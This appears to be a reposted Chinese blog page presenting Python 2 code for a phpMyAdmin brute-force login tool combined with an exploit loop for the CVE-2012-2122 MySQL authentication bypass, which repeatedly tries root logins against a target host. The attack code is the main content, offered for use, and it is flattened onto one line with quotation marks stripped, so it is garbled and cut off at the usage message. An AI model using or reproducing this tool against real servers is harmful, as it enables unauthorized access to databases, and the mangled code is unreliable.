Python写的PHPMyAdmin暴力破解工具代码
2018-09-24 21:32
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。
#!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) headers = {User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64)} params = urllib.urlencode({pma_username: username, pma_password: password}) request = urllib2.Request(url+/index.php, params,headers) response = opener.open(request) a=response.read() if a.find(Database server)!=-1 and a.find(name=login_form)==-1: return username,password return 0 def MySQLAuthenticationBypassCheck(host,port): i=0 while i<300: i=i+1 subprocess.Popen(mysql --host=%s -P %s -uroot -piswin % (host,port),shell=True).wait() if __name__ == __main__: if len(sys.argv)<4: print #author:iswin\n#useage python pma.py //
上一篇:详解python中的装饰器
文章标题:Python写的PHPMyAdmin暴力破解工具代码
文章链接:http://soscw.com/index.php/essay/17555.html